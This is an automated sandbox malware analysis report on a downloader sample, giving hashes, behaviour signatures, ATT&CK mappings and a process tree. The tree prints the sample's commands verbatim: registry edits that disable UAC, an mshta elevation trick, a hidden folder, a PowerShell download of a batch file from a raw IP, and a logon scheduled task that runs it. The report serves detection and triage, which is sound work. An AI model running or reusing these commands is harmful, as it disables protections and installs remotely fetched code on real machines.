2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d

Analysis

max time kernel
146s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
15-05-2024 11:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

av_downloader1.1.exe
Size

88KB
MD5

759f5a6e3daa4972d43bd4a5edbdeb11
SHA1

36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256

2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512

f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
SSDEEP

1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV

Score

10^/10

evasion execution trojan

Malware Config

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
20	4892	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4892	powershell.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2240	attrib.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	av_downloader1.1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	AV_DOW~1.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4504	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
4840	msedge.exe
4840	msedge.exe
4892	powershell.exe
2680	msedge.exe
2680	msedge.exe
4892	powershell.exe
4892	powershell.exe
4768	identity_helper.exe
4768	identity_helper.exe
764	msedge.exe
764	msedge.exe
764	msedge.exe
764	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4892	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe
2680	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2744 wrote to memory of 4932	2744	av_downloader1.1.exe	83
PID 2744 wrote to memory of 4932	2744	av_downloader1.1.exe	83
PID 4932 wrote to memory of 3720	4932	cmd.exe	86
PID 4932 wrote to memory of 3720	4932	cmd.exe	86
PID 3720 wrote to memory of 3492	3720	mshta.exe	87
PID 3720 wrote to memory of 3492	3720	mshta.exe	87
PID 3720 wrote to memory of 3492	3720	mshta.exe	87
PID 3492 wrote to memory of 4252	3492	AV_DOW~1.EXE	88
PID 3492 wrote to memory of 4252	3492	AV_DOW~1.EXE	88
PID 4252 wrote to memory of 5064	4252	cmd.exe	90
PID 4252 wrote to memory of 5064	4252	cmd.exe	90
PID 4252 wrote to memory of 2620	4252	cmd.exe	91
PID 4252 wrote to memory of 2620	4252	cmd.exe	91
PID 4252 wrote to memory of 4488	4252	cmd.exe	92
PID 4252 wrote to memory of 4488	4252	cmd.exe	92
PID 4252 wrote to memory of 1552	4252	cmd.exe	93
PID 4252 wrote to memory of 1552	4252	cmd.exe	93
PID 1552 wrote to memory of 4952	1552	cmd.exe	94
PID 1552 wrote to memory of 4952	1552	cmd.exe	94
PID 4252 wrote to memory of 2680	4252	cmd.exe	96
PID 4252 wrote to memory of 2680	4252	cmd.exe	96
PID 2680 wrote to memory of 4204	2680	msedge.exe	97
PID 2680 wrote to memory of 4204	2680	msedge.exe	97
PID 4252 wrote to memory of 2240	4252	cmd.exe	98
PID 4252 wrote to memory of 2240	4252	cmd.exe	98
PID 4252 wrote to memory of 4892	4252	cmd.exe	99
PID 4252 wrote to memory of 4892	4252	cmd.exe	99
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100
PID 2680 wrote to memory of 4120	2680	msedge.exe	100

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2240	attrib.exe

C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe
"C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2744
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3132.tmp\3133.tmp\3134.bat C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4932
- - C:\Windows\system32\mshta.exe
    mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3720
  - - C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE
      "C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE" goto :target
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:3492
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3326.tmp\3327.tmp\3328.bat C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE goto :target"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4252
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:5064
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:2620
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:4488
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1552
        
        C:\Windows\system32\reg.exe
        
        reg query HKEY_CLASSES_ROOT\http\shell\open\command
        7⤵
        
        PID:4952
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:2680
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd8e6946f8,0x7ffd8e694708,0x7ffd8e694718
        7⤵
        
        PID:4204
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,3666994980746445957,18358002877256531069,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
        7⤵
        
        PID:4120
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,3666994980746445957,18358002877256531069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4840
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,3666994980746445957,18358002877256531069,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
        7⤵
        
        PID:1544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3666994980746445957,18358002877256531069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
        7⤵
        
        PID:3128
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3666994980746445957,18358002877256531069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
        7⤵
        
        PID:1600
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3666994980746445957,18358002877256531069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
        7⤵
        
        PID:1632
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,3666994980746445957,18358002877256531069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8
        7⤵
        
        PID:904
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,3666994980746445957,18358002877256531069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4768
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3666994980746445957,18358002877256531069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
        7⤵
        
        PID:2052
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3666994980746445957,18358002877256531069,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
        7⤵
        
        PID:4644
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3666994980746445957,18358002877256531069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
        7⤵
        
        PID:5420
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3666994980746445957,18358002877256531069,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
        7⤵
        
        PID:5428
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,3666994980746445957,18358002877256531069,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4816 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:764
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h d:\net
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2240
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4892
      - C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
        6⤵
        Creates scheduled task(s)
        
        PID:4504

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4896

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3316

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b2a1398f937474c51a48b347387ee36a

SHA1
922a8567f09e68a04233e84e5919043034635949

SHA256
2dc0bf08246ddd5a32288c895d676017578d792349ca437b1b36e7b2f0ade6d6

SHA512
4a660c0549f7a850e07d8d36dab33121af02a7bd7e9b2f0137930b4c8cd89b6c5630e408f882684e6935dcb0d5cb5e01a854950eeda252a4881458cafcc7ef7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
1ac52e2503cc26baee4322f02f5b8d9c

SHA1
38e0cee911f5f2a24888a64780ffdf6fa72207c8

SHA256
f65058c6f1a745b37a64d4c97a8e8ee940210273130cec97a67f568088b5d4d4

SHA512
7670d606bc5197ecb7db3ddaecd6f74a80e6decae92b94e0e8145a7f463fa099058e89f9dfa1c45b9197c36e5e21994698186a2ec970bbdb0937fe28ca46a834

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
840B

MD5
a317edbe274ad60f86a3942613bff686

SHA1
6cbd4d7d787e0fb07f38614ad7b8cd3df49d8976

SHA256
9e9fadcb1f33e80d7347112af4b7e6dac70bf28b69eab55b423f21218ca58d70

SHA512
82aa2348392ac26ab7a1af4c859ad603d5bd54d7bed583415c4c4a6b860782a6eba4d3bf3efe844ac8aad3f619796cb65553f41921993c190cca4dcc57d87df7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
ec957884b114341aaec1cd6473fb9ed5

SHA1
facf7810ead71141796c9e8ba817d043911c9543

SHA256
3076260c822c1d25bf1217b3e7582a23d3fb2b2030f23b3d5a2f4afd2b847fcf

SHA512
51e2ad0e5673176165cd1ceaaa89c3184fb506337d9f8d96dc79c59d650b86e0560036d92e1fe456633ff901fa44eb9b7ad4c9f1ff9c477782a167686ca1fc6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
a80c51e07f81cf0f2e816c1877fbfc1e

SHA1
e2e1ff14f6b6f9cdaeacfd57cbd61f5d56ae9b4a

SHA256
783427aaa954f9a2b05192bc183073b1af8a7371c47723e1cc6047582ae11245

SHA512
f27782d9742a8e41b8d9a56639b9c4ed492383757740fdca042ed4fd79b283ded4d08ea54cdf14f0a82433f199d177610c074c4eb12e2695e22adf9b7f91067f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
07d86ec45946e2dca47c41882d470656

SHA1
c54b41562f42fd2d54cb3046681dd6ac514fc277

SHA256
e739627e299083f52ca925924ceadfc65aba3bce4e66d1c077a78ca6f3cdc8f8

SHA512
80dd65cb3d4918108cce1fd9ed05f2bb64c8fe10d341f8714253fc68c2f2331b5ad74ed386bb73721404608f84874bc8839c6e5d3f7465de5412251e27baaba3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
1f01ffebd850ab1951d527a31fa61b31

SHA1
1a56d0d645847c4e65e1d6d8fb40aa74d8db8c26

SHA256
eaea89746fd3b6cb668c2cf535c045893ecbfa96ad3b2a53a9fa527e407c2010

SHA512
abb3900650ef6faf1fc1f6559dace50438981c4ca7774f6ae2d8a5a6437a94e77ca8fb8a58fca7bd52d273cce535f31ca1defcc5a2d03e98e25d52af75021450

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57928b.TMP

Filesize
48B

MD5
27af2f2685570edcffccc211ddd21d29

SHA1
c0afb1d6a26e85cc9c910be1abfff24646c76d71

SHA256
015bd8b342c041d8b453accf40504c7e6a3984e60d55febf4b078b4180d6fe8f

SHA512
529df8122f0f3fb3a6b037bb3d386b381a104673a23df0586de98f605229c2a49e0c8d191161c1f71e8ab9435fc61892ef3d2da453e6ec9524c6658d73e67e58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
18e3e27bdbeca18d549e4a6f471daaef

SHA1
5b43184883b41491aee0e2a339cec43d52297e58

SHA256
aea3f5c0b81a54975db6f2e98a29618d1730d71bcd9bf60bb355d1b1bd2e879b

SHA512
3f766f6aaaa5978e7f0624522caec449756b4917576ebb1377fb50d2bcc6425908c0d67e7f9e78bbab4f874060b9da971d1d6691d5368ff2c013e40a7b0b0696

Download Submit
C:\Users\Admin\AppData\Local\Temp\3132.tmp\3133.tmp\3134.bat

Filesize
1KB

MD5
9856d2fe29a28c54c5943c2150f7bae1

SHA1
f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97

SHA256
0b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999

SHA512
002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ihiu1ho.tqa.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4892-21-0x000002596EB30000-0x000002596EB52000-memory.dmp

Filesize
136KB

Download